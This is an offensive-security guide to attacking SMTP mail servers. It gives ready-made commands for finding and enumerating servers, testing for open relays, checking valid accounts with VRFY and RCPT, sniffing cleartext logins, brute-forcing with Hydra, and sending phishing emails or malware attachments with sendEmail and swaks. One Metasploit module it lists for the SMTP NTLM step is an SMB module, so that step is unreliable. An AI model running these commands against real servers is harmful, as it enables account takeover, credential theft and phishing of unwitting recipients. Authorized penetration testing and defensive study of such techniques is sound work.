# SMTP/s - Port 25,465,587

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://buymeacoffee.com/verylazytech/membership)**! 🎁**
* **Follow** us on **Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**,** **Github** [**@VeryLazyTech**](https://github.com/verylazytech)**, and Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* Visit our [**shop** ](https://buymeacoffee.com/verylazytech/extras)for e-books and courses.  📚
* Support us and [**buy me a coffee**](https://buymeacoffee.com/verylazytech)**. ☕**

</details>

SMTP (Simple Mail Transfer Protocol) is a core component of the internet's email infrastructure, responsible for sending and receiving emails. It's a protocol within the TCP/IP suite, frequently working alongside POP3 or IMAP to store emails on servers and allow users to access them. Despite its widespread use, SMTP has certain vulnerabilities that make it a popular target for penetration testers and hackers.

## SMTP Commands:

**HELO** It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.

**EHLO** An alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.

**MAIL FROM** With this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.

**RCPT TO** It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.

**SIZE** This SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.

**DATA** With the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.

**VRFY** The server is asked to verify whether a particular email address or username actually exists.

**TURN** This command is used to invert roles between the client and the server, without the need to run a new connaction.

**AUTH** With the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission.

**RSET** It communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed (like in the case of QUIT).

**EXPN** This SMTP command asks for a confirmation about the identification of a mailing list.

**HELP** It’s a client’s request for some information that can be useful for the a successful transfer of the email.

**QUIT** It terminates the SMTP conversation.

## **Reconnaissance and Information Gathering**

**Subdomain Enumeration & DNS Misconfigurations**: Before jumping into SMTP directly, expand the reconnaissance section to include subdomain enumeration for deeper target discovery. Tools like `amass` or `sublist3r` could be used here to identify potential SMTP servers:

```bash
amass enum -d <target-domain>
```

Subdomains could potentially host misconfigured or less secure SMTP servers.

### **1.1. Identify Open SMTP Ports**

Start by using tools like **Nmap** to identify open ports, typically 25 (SMTP), 465 (SMTPS), and 587 (Submission over TLS):

```bash
nmap -p25,465,587 --open <target-IP>
```

Using Metasploit:

```
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target-IP>
set THREADS 10
run
```

### **1.2. MX Record Discovery**

Discover Mail Exchanger (MX) records for the target organization:

```bash
dig +short mx <target-domain>
```

This will return the mail servers responsible for receiving emails for the domain.

### **1.3. Banner Grabbing**

Banner grabbing helps identify the SMTP server version, which could contain known vulnerabilities. Use **Netcat** or **OpenSSL** to connect and grab the banner:

```bash
nc -vn <target-IP> 25
```

For secure connections:

```bash
openssl s_client -starttls smtp -connect <target-IP>:587
```

Using Metasploit:

```bash
use auxiliary/scanner/smtp/smtp_version
```

**Look for:**

* **Server versions**
* **Mail server type (Microsoft ESMTP, Postfix, Exim, etc.)**
* **Any other information leaks (internal hostnames)**

***

## **Enumeration and Vulnerability Discovery**

### **2.1. Enumerate SMTP Commands**

Use **Nmap's** `smtp-commands` script to enumerate supported SMTP commands. This may give insights into how to interact with the server, and whether certain attack vectors (like relay attacks) are possible.

```bash
nmap -p25 --script smtp-commands <target-IP>
```

### **2.2. Open Relay Testing**

An open SMTP relay can be abused to send spam or phishing emails without authentication. Use the **smtp-open-relay** Nmap script to test for this vulnerability:

```bash
nmap -p25 --script smtp-open-relay <target-IP>
```

Using Telent:

```
telnet <target-IP> 25
helo attacker.com
mail from: attacker@attacker.com
rcpt to: victim@target.com
data
This is a test email to verify open relay.
.
quit
```

If the server is vulnerable, you will be able to send emails without being an authenticated user.

### **2.3. Verify Users**

SMTP servers can sometimes allow username verification using **RCPT TO** and **VRFY** commands, revealing valid email accounts on the system.

```bash
telnet <target-IP> 25
HELO test.com
MAIL FROM: attacker@attacker.com
RCPT TO: victim@target.com
```

If you get a **250 OK** response, the email address is valid.

You can automate this using tools like **smtp-user-enum**:

```bash
smtp-user-enum -M VRFY -U users.txt -t <target-IP>
```

***

## **Exploiting Information Disclosure and Misconfigurations**

### **3.1. Internal Server Name Disclosure**

Some SMTP servers may leak internal server names in the response to commands like `MAIL FROM:`. For example:

```bash
MAIL FROM: attacker@example.com
```

Response:

```arduino
250 me@INTERNAL-SERVER.local...Sender OK
```

This internal information could be used in later attacks.

### **3.2. NTLM Authentication Information Disclosure**

If the SMTP server supports **NTLM authentication**, you can extract sensitive information by interacting with the authentication process.&#x20;

```bash
nmap --script smtp-ntlm-info.nse -p25 <target-IP>
```

Using Metasploit:

```
use auxiliary/scanner/smb/smb_ntlm_credential_dump
set RHOSTS <target-IP>
run
```

***

## **Password Cracking and Credential Harvesting**

### **4.1. Sniffing Cleartext Credentials**

SMTP running on port 25 (non-SSL) may allow you to capture email credentials via network sniffing using **Wireshark** or **tcpdump**. Look for cleartext `AUTH LOGIN` or `AUTH PLAIN` credentials.

**Wireshark** filter:

```bash
tcp.port == 25 && tcp contains "AUTH"
```

### **4.2. SMTP Brute-Forcing**

If authentication is required but weak credentials are suspected, use brute-forcing tools such as **Hydra:**&#x20;

```bash
hydra -L users.txt -P passwords.txt smtp://<target-IP> -V
```

***

## **Sending Malicious Emails (Post-Exploitation)**

Once access is gained to the SMTP server or an open relay is found, it is possible to send phishing emails, malware, or perform further reconnaissance.

### **5.1. Send an Email from Linux Command Line**

```bash
sendEmail -t victim@target.com -f attacker@malicious.com -s <target-IP> -u "Urgent" -m "Please open the attached document" -a /path/to/malware.pdf
```

Or use **Swaks** to send phishing emails:

```bash
swaks --to victim@target.com --from attacker@malicious.com --header "Subject: Urgent" --body "Click this link" --server <target-IP>
```

### **5.2. Phishing with EICAR Test File**

Test antivirus defenses by sending an EICAR test file to see if the server scans attachments for malware. This helps identify email gateway filtering systems:

```bash
sendEmail -t victim@target.com -f attacker@malicious.com -s <target-IP> -u "Test" -a /path/to/eicar.com
```